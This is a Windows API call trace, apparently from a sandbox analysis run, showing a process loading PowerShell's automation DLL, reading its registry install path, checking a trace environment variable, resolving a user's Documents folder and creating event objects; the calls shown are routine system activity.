	[0228.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0235.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0235.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0235.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0235.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0235.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0235.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0235.457] VirtualQuery (in: lpAddress=0x27b690, lpBuffer=0x27c550, dwLength=0x30 | out: lpBuffer=0x27c550*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0235.461] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0235.461] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0235.461] CoTaskMemFree (pv=0x18fd40) 
	[0236.036] VirtualQuery (in: lpAddress=0x27b690, lpBuffer=0x27c550, dwLength=0x30 | out: lpBuffer=0x27c550*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0236.058] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0236.058] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0236.058] CoTaskMemFree (pv=0x18fd40) 
	[0236.060] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0236.060] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0236.060] CoTaskMemFree (pv=0x18fd40) 
	[0236.063] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0236.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0236.063] CoTaskMemFree (pv=0x18fd40) 
	[0236.690] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0236.690] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0236.690] CoTaskMemFree (pv=0x18fd40) 
	[0236.695] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0236.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0236.695] CoTaskMemFree (pv=0x18fd40) 
	[0236.696] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0236.696] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0236.696] CoTaskMemFree (pv=0x18fd40) 
	[0237.940] VirtualQuery (in: lpAddress=0x27b690, lpBuffer=0x27c550, dwLength=0x30 | out: lpBuffer=0x27c550*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0237.946] VirtualQuery (in: lpAddress=0x27b690, lpBuffer=0x27c550, dwLength=0x30 | out: lpBuffer=0x27c550*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0250.028] VirtualQuery (in: lpAddress=0x27b690, lpBuffer=0x27c550, dwLength=0x30 | out: lpBuffer=0x27c550*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0250.384] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0250.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.384] CoTaskMemFree (pv=0x18fd40) 
	[0252.171] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x190180
	[0252.173] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x190290
	[0255.939] VirtualQuery (in: lpAddress=0x27b690, lpBuffer=0x27c550, dwLength=0x30 | out: lpBuffer=0x27c550*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0258.708] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1903a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.708] CoTaskMemFree (pv=0x1903a0) 
	[0259.308] CoTaskMemAlloc (cb=0x104) returned 0x1903a0
	[0259.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1903a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0259.308] CoTaskMemFree (pv=0x1903a0) 
	[0259.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0264.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0264.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0264.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0264.471] VirtualQuery (in: lpAddress=0x27b940, lpBuffer=0x27c800, dwLength=0x30 | out: lpBuffer=0x27c800*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0264.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0264.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0264.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0264.484] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27d71c, lpData=0x0, lpcbData=0x27d718*=0x0 | out: lpType=0x27d71c*=0x1, lpData=0x0, lpcbData=0x27d718*=0x56) returned 0x0
	[0264.484] CoTaskMemAlloc (cb=0x5a) returned 0x1b871220
	[0264.484] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27d6ec, lpData=0x1b871220, lpcbData=0x27d6e8*=0x56 | out: lpType=0x27d6ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x27d6e8*=0x56) returned 0x0
	[0264.484] CoTaskMemFree (pv=0x1b871220) 
	[0264.484] RegCloseKey (hKey=0x360) returned 0x0
	[0264.485] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d798 | out: phkResult=0x27d798*=0x360) returned 0x0
	[0264.485] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27d71c, lpData=0x0, lpcbData=0x27d718*=0x0 | out: lpType=0x27d71c*=0x1, lpData=0x0, lpcbData=0x27d718*=0x56) returned 0x0
	[0264.485] CoTaskMemAlloc (cb=0x5a) returned 0x1b871220
	[0264.485] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27d6ec, lpData=0x1b871220, lpcbData=0x27d6e8*=0x56 | out: lpType=0x27d6ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x27d6e8*=0x56) returned 0x0
	[0264.485] CoTaskMemFree (pv=0x1b871220) 
	[0264.485] RegCloseKey (hKey=0x360) returned 0x0
	[0264.485] CoTaskMemAlloc (cb=0x20c) returned 0x1b84f650
	[0264.485] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b84f650 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0264.485] CoTaskMemFree (pv=0x1b84f650) 
	[0264.485] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27d350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0264.486] CoTaskMemAlloc (cb=0x20c) returned 0x1b84f650
	[0264.486] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b84f650 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0264.486] CoTaskMemFree (pv=0x1b84f650) 
	[0264.486] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27d350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0264.490] CoTaskMemAlloc (cb=0x104) returned 0x1903a0
	[0264.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1903a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0264.490] CoTaskMemFree (pv=0x1903a0) 
	[0264.491] CoTaskMemAlloc (cb=0x104) returned 0x1903a0
	[0264.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1903a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0264.491] CoTaskMemFree (pv=0x1903a0) 
	[0264.493] CoTaskMemAlloc (cb=0x104) returned 0x1903a0
	[0264.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1903a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0264.493] CoTaskMemFree (pv=0x1903a0) 
	[0264.495] CoTaskMemAlloc (cb=0x104) returned 0x1903a0
	[0264.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1903a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0264.495] CoTaskMemFree (pv=0x1903a0) 
	[0265.055] CoTaskMemAlloc (cb=0x104) returned 0x1903a0
	[0265.055] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1903a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.055] CoTaskMemFree (pv=0x1903a0) 
	[0265.057] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x360
	[0265.057] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x364
	[0265.057] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x374
	[0265.057] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0265.057] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x368
	[0265.057] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x2e4
	[0265.057] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1d0
	[0265.057] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c
	[0265.057] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x30c
	[0265.057] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x320
	[0265.057] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0265.057] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0265.059] CoTaskMemAlloc (cb=0x104) returned 0x1903a0
	[0265.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1903a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.059] CoTaskMemFree (pv=0x1903a0) 

Thread:
	id = 327
